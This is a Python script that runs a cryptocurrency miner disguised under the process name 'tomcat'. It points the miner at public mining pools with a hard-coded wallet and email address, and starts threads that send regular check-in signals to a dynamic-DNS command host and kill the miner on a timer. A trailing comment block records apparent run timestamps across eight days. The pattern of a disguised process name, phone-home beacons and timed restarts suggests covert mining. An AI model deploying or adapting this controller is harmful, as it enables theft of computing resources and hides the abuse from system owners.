import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:50:04.193163
#2018-02-17 16:36:06.947341
#2018-02-17 18:24:05.866917
#2018-02-17 20:13:02.211832
#2018-02-17 22:01:02.212443
#2018-02-17 23:46:06.040438
#2018-02-18 01:36:06.079227
#2018-02-18 03:23:04.943733
#2018-02-18 05:11:05.090344
#2018-02-18 07:03:01.394380
#2018-02-18 08:51:06.103378
#2018-02-18 10:38:07.122333
#2018-02-18 12:23:05.683006
#2018-02-18 14:11:03.951450
#2018-02-18 16:01:01.656972
#2018-02-18 17:50:02.873081
#2018-02-18 19:37:04.923092
#2018-02-18 21:22:01.860469
#2018-02-18 23:09:06.719072
#2018-02-19 00:56:05.231720
#2018-02-19 02:43:06.669135
#2018-02-19 04:30:09.207374
#2018-02-19 06:16:07.328099
#2018-02-19 08:04:07.940493
#2018-02-19 09:54:08.049730
#2018-02-19 11:43:07.778010
#2018-02-19 13:30:01.970749
#2018-02-19 15:20:08.389016
#2018-02-19 17:09:06.856782
#2018-02-19 18:54:05.478205
#2018-02-19 20:33:08.766111
#2018-02-19 22:19:05.341041
#2018-02-20 00:06:04.981271
#2018-02-20 01:52:04.183856
#2018-02-20 03:40:09.373422
#2018-02-20 05:27:05.237593
#2018-02-20 07:11:05.687466
#2018-02-20 08:56:06.458391
#2018-02-20 10:39:07.850791
#2018-02-20 12:26:04.614575
#2018-02-20 14:12:06.441653
#2018-02-20 15:56:08.037782
#2018-02-20 17:43:11.576912
#2018-02-20 19:33:04.446734
#2018-02-20 21:20:08.269382
#2018-02-20 23:06:07.448816
#2018-02-21 00:51:02.205000
#2018-02-21 02:36:05.428192
#2018-02-21 04:24:04.300897
#2018-02-21 06:12:04.554101
#2018-02-21 07:57:06.356217
#2018-02-21 09:43:01.877993
#2018-02-21 11:32:01.883981
#2018-02-21 13:22:01.363420
#2018-02-21 15:08:12.062250
#2018-02-21 16:59:10.592954
#2018-02-21 18:49:07.574500
#2018-02-21 20:40:07.291776
#2018-02-21 22:25:05.289871
#2018-02-22 00:14:06.911369
#2018-02-22 02:01:07.834711
#2018-02-22 03:47:05.250516
#2018-02-22 05:34:07.914901
#2018-02-22 07:19:03.840670
#2018-02-22 09:06:07.426770
#2018-02-22 10:54:05.956974
#2018-02-22 12:39:01.625548
#2018-02-22 14:23:01.468200
#2018-02-22 16:12:04.788677
#2018-02-22 18:01:02.158647
#2018-02-22 19:49:07.899188
#2018-02-22 21:39:04.207207
#2018-02-22 23:27:08.099348
#2018-02-23 01:17:08.115887
#2018-02-23 03:03:02.892567
#2018-02-23 04:52:02.109170
#2018-02-23 06:37:07.116181
#2018-02-23 08:26:07.116741
#2018-02-23 10:41:08.292248
#2018-02-23 12:36:08.536887
#2018-02-23 14:22:08.684968
#2018-02-23 16:13:05.812521
#2018-02-23 17:59:04.645007
#2018-02-23 19:45:07.902409
#2018-02-23 21:29:08.273462
#2018-02-23 23:18:04.119935
#2018-02-24 01:08:03.887873
#2018-02-24 02:59:05.000605
#2018-02-24 04:46:05.926601
#2018-02-24 06:33:01.823451
#2018-02-24 08:22:05.030577
#2018-02-24 10:05:05.527058
#2018-02-24 12:02:05.185947
#2018-02-24 13:50:08.857435
#2018-02-24 15:30:08.287968
#2018-02-24 17:21:03.830402
#2018-02-24 19:10:01.558083
#2018-02-24 20:59:05.391672
#2018-02-24 23:28:05.477380
#2018-02-25 03:36:01.226941
#2018-02-25 07:14:05.423586